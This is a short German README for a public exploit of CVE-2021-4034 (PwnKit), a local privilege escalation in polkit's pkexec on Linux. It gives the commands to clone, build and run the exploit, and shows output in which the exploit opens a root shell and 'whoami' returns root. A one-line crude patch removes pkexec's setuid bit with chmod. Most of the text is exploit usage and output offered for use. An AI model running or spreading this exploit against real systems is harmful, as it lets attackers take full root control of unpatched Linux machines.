
Exploit für CVE-2021-4034 (PwnKit) in Polkit's pkexec, der eine lokale Rechteausweitung auf Root auf Linux-Systemen ermöglicht. Enthält Build-Anweisungen und einen groben Patch.
$ git clone https://github.com/Anonymous-Family/CVE-2021-4034.git
$ cd CVE-2021-4034
$ make
[!] CVE-2021-4034 Exploit By whokilleddb
[!] Initializing Setup
[+] Setup Done :D
[!] Setting Root Privileges
[!] Launching Root Shell
# /bin/whoami
root
# chmod 0755 `which pkexec`
Hinweis: Du kannst die Optionen konfigurieren, indem du mit include/config.h herumspielst